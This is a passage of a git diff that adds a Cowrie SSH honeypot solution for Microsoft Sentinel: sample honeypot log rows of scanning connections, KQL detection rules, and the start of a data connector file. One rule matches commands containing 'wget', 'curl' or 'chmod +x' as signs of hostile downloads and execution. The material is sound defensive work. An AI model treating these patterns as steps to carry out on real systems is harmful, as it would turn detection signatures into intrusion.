seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T07:14:31.220373Z"",""src_ip"":""36.138.164.147"",""session"":""9a68e84f7827""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:36:27.205 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""2.228.25.92"",""src_port"":45088,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""440f561391f3"",""protocol"":""ssh"",""message"":""New connection: 2.228.25.92:45088 (10.0.0.4:2222) [session: 440f561391f3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:36:27.204603Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:36:27.207 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.000728607177734375,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T11:36:27.206621Z"",""src_ip"":""2.228.25.92"",""session"":""440f561391f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:01:09.322 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""104.45.233.189"",""src_port"":47134,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""749c76d5a3c6"",""protocol"":""ssh"",""message"":""New connection: 104.45.233.189:47134 (10.0.0.4:2222) [session: 749c76d5a3c6]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:01:09.321072Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:01:09.324 PM",,"{""eventid"":""cowrie.client.version"",""version"":""MGLNDD_13.82.122.110_22"",""message"":""Remote SSH version: MGLNDD_13.82.122.110_22"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:01:09.322573Z"",""src_ip"":""104.45.233.189"",""session"":""749c76d5a3c6""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:01:09.325 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.002718687057495117,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:01:09.325165Z"",""src_ip"":""104.45.233.189"",""session"":""749c76d5a3c6""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:39:40.055 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""38.88.252.187"",""src_port"":44426,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1a0d25db4b8f"",""protocol"":""ssh"",""message"":""New connection: 38.88.252.187:44426 (10.0.0.4:2222) [session: 1a0d25db4b8f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:39:40.054363Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 3:39:40.129 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.07244014739990234,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T15:39:40.128326Z"",""src_ip"":""38.88.252.187"",""session"":""1a0d25db4b8f""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:27:55.506 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""52.228.167.158"",""src_port"":54022,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""cf66f899f5e3"",""protocol"":""ssh"",""message"":""New connection: 52.228.167.158:54022 (10.0.0.4:2222) [session: cf66f899f5e3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:27:55.505219Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:27:55.507 PM",,"{""eventid"":""cowrie.client.version"",""version"":""MGLNDD_13.82.122.110_22"",""message"":""Remote SSH version: MGLNDD_13.82.122.110_22"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:27:55.506892Z"",""src_ip"":""52.228.167.158"",""session"":""cf66f899f5e3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 8:27:55.508 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0014579296112060547,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T20:27:55.508224Z"",""src_ip"":""52.228.167.158"",""session"":""cf66f899f5e3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:53:12.496 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""104.152.52.234"",""src_port"":49147,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""ebbcc72654bf"",""protocol"":""ssh"",""message"":""New connection: 104.152.52.234:49147 (10.0.0.4:2222) [session: ebbcc72654bf]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:53:12.495310Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:53:12.519 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.021689176559448242,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:53:12.518360Z"",""src_ip"":""104.152.52.234"",""session"":""ebbcc72654bf""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:54:50.231 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""52.228.154.149"",""src_port"":40100,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""dfdf6234a1c1"",""protocol"":""ssh"",""message"":""New connection: 52.228.154.149:40100 (10.0.0.4:2222) [session: dfdf6234a1c1]"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:54:50.230597Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:54:50.235 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:54:50.234747Z"",""src_ip"":""52.228.154.149"",""session"":""dfdf6234a1c1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:54:50.273 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""2aec6b44b06bec95d73f66b5d30cb69a"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:54:50.271594Z"",""src_ip"":""52.228.154.149"",""session"":""dfdf6234a1c1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:55:00.340 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":10.107726335525513,""message"":""Connection lost after 10 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:55:00.339829Z"",""src_ip"":""52.228.154.149"",""session"":""dfdf6234a1c1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:32:02.517 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""129.222.103.39"",""src_port"":34808,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""746c2dc4ea94"",""protocol"":""ssh"",""message"":""New connection: 129.222.103.39:34808 (10.0.0.4:2222) [session: 746c2dc4ea94]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:32:02.516733Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:32:02.857 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.3384232521057129,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:32:02.856500Z"",""src_ip"":""129.222.103.39"",""session"":""746c2dc4ea94""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.309 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":45512,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1f933435d66c"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:45512 (10.0.0.4:2222) [session: 1f933435d66c]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.307894Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.467 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.466449Z"",""src_ip"":""192.155.90.118"",""session"":""1f933435d66c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.469 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.467680Z"",""src_ip"":""192.155.90.118"",""session"":""1f933435d66c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.735 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.42455077171325684,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.734930Z"",""src_ip"":""192.155.90.118"",""session"":""1f933435d66c""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:07.750 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":45528,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""eaba464dec31"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:45528 (10.0.0.4:2222) [session: eaba464dec31]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:07.749835Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.010 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.009688Z"",""src_ip"":""192.155.90.118"",""session"":""eaba464dec31""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.012 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.010914Z"",""src_ip"":""192.155.90.118"",""session"":""eaba464dec31""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.693 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.9419634342193604,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.692997Z"",""src_ip"":""192.155.90.118"",""session"":""eaba464dec31""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:08.714 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""192.155.90.118"",""src_port"":45542,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""4654b0bf8b29"",""protocol"":""ssh"",""message"":""New connection: 192.155.90.118:45542 (10.0.0.4:2222) [session: 4654b0bf8b29]"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:08.713752Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:09.129 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:09.128366Z"",""src_ip"":""192.155.90.118"",""session"":""4654b0bf8b29""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:09.131 AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:09.129552Z"",""src_ip"":""192.155.90.118"",""session"":""4654b0bf8b29""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/21/2024, 12:09:09.926 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":1.2106218338012695,""message"":""Connection lost after 1 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-21T00:09:09.925864Z"",""src_ip"":""192.155.90.118"",""session"":""4654b0bf8b29""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml new file mode 100644 index 00000000000..110a53cda43 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/AlertonHighNumberofFailedLoginAttempts.yaml @@ -0,0 +1,34 @@ +id: ccbfc8aa-d1fe-4f62-b192-67f6c4edc9a2 +name: Alert on High Number of Failed Login Attempts +description: | + 'Detect brute-force or password-guessing attacks by monitoring a high volume of failed login attempts.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - CredentialAccess +relevantTechniques: + - T1110 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.login.failed" + | summarize FailedAttempts = count() by SourceIP + | where FailedAttempts > 2 + | project SourceIP, FailedAttempts + | order by FailedAttempts desc +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectConnectionEvents.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectConnectionEvents.yaml new file mode 100644 index 00000000000..9b2a3a5766b --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectConnectionEvents.yaml @@ -0,0 +1,31 @@ +id: 4a566fa4-f901-44fd-9890-a476d163e86a +name: Detect Connection Events +description: | + 'Track connection events to detect unusual patterns in access or possible reconnaissance activity.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - Discovery +relevantTechniques: + - T0840 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.session.closed" + | project SourceIP +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectFileUploadsandDownloads.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectFileUploadsandDownloads.yaml new file mode 100644 index 00000000000..cf39eaac993 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectFileUploadsandDownloads.yaml @@ -0,0 +1,49 @@ +id: 53016cac-ca6c-4b2b-a4c4-7325afcb9502 +name: Detect File Uploads and Downloads +description: | + 'Monitor file uploads and downloads to detect potential exfiltration or data theft activities.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - LateralMovement +relevantTechniques: + - T0843 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend URL = tostring(parse_json(RawData).url) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | extend Sha256Value = tostring(parse_json(RawData).shasum) + | extend Message = tostring(parse_json(RawData).message) + | extend Outfile = tostring(parse_json(RawData).outfile) + | where EventID in ("cowrie.session.file_upload", "cowrie.session.file_download") + | project EventID, SourceIP, URL, Outfile, Sha256Value +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP + - entityType: File + fieldMappings: + - identifier: Name + columnName: Outfile + - entityType: FileHash + fieldMappings: + - identifier: Value + columnName: Sha256Value + - identifier: Algorithm + columnName: Message + - entityType: URL + fieldMappings: + - identifier: Url + columnName: URL +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectSuspiciousFileDownloads.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectSuspiciousFileDownloads.yaml new file mode 100644 index 00000000000..d18ea00fc55 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/DetectSuspiciousFileDownloads.yaml @@ -0,0 +1,37 @@ +id: b86b27e3-adb9-4f39-8c4e-0b7300031984 +name: Detect Suspicious File Downloads +description: | + 'Identify instances where files were downloaded from suspicious or known malicious URLs.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - LateralMovement +relevantTechniques: + - T0843 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend URL = tostring(parse_json(RawData).url) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.session.file_download" + | where URL contains "malicious-site.com" or URL contains "suspicious" + | project SourceIP, URL +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP + - entityType: URL + fieldMappings: + - identifier: Url + columnName: URL +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/MonitorUnusualFileExecution.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/MonitorUnusualFileExecution.yaml new file mode 100644 index 00000000000..0d9403b563b --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/MonitorUnusualFileExecution.yaml @@ -0,0 +1,33 @@ +id: f72805a7-b8c5-45fb-aacf-d0db7e0bf49b +name: Monitor Unusual File Execution +description: | + 'Detect attempts to execute files or scripts that are unusual or not typical for the environment.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - Execution +relevantTechniques: + - T1204 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend Command = tostring(parse_json(RawData).command) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.session.command" + | where Command contains "wget" or Command contains "curl" or Command contains "chmod +x" + | project SourceIP, Command +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Data Connectors/Microsoft-SSHCowrieSensor.json b/Solutions/Sensor SSH Cowrie/Data Connectors/Microsoft-SSHCowrieSensor.json new file mode 100644 index 00000000000..272f0a238e2 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Data Connectors/Microsoft-SSHCowrieSensor.json @@ -0,0 +1,108 @@ +{ + "id": "MicrosoftSSHCowrieSensor", + "title": "Microsoft SSH Cowrie Sensor", + "publisher": "Microsoft", + "descriptionMarkdown": "The Sensor SSH Cowrie data connector provides the capability to deploy a Linux based Azure VM host with Cowrie setup and configured. Included with CustomTable, AMA, DCR, DCE ready to go and ingesting Cowrie events on host. You can 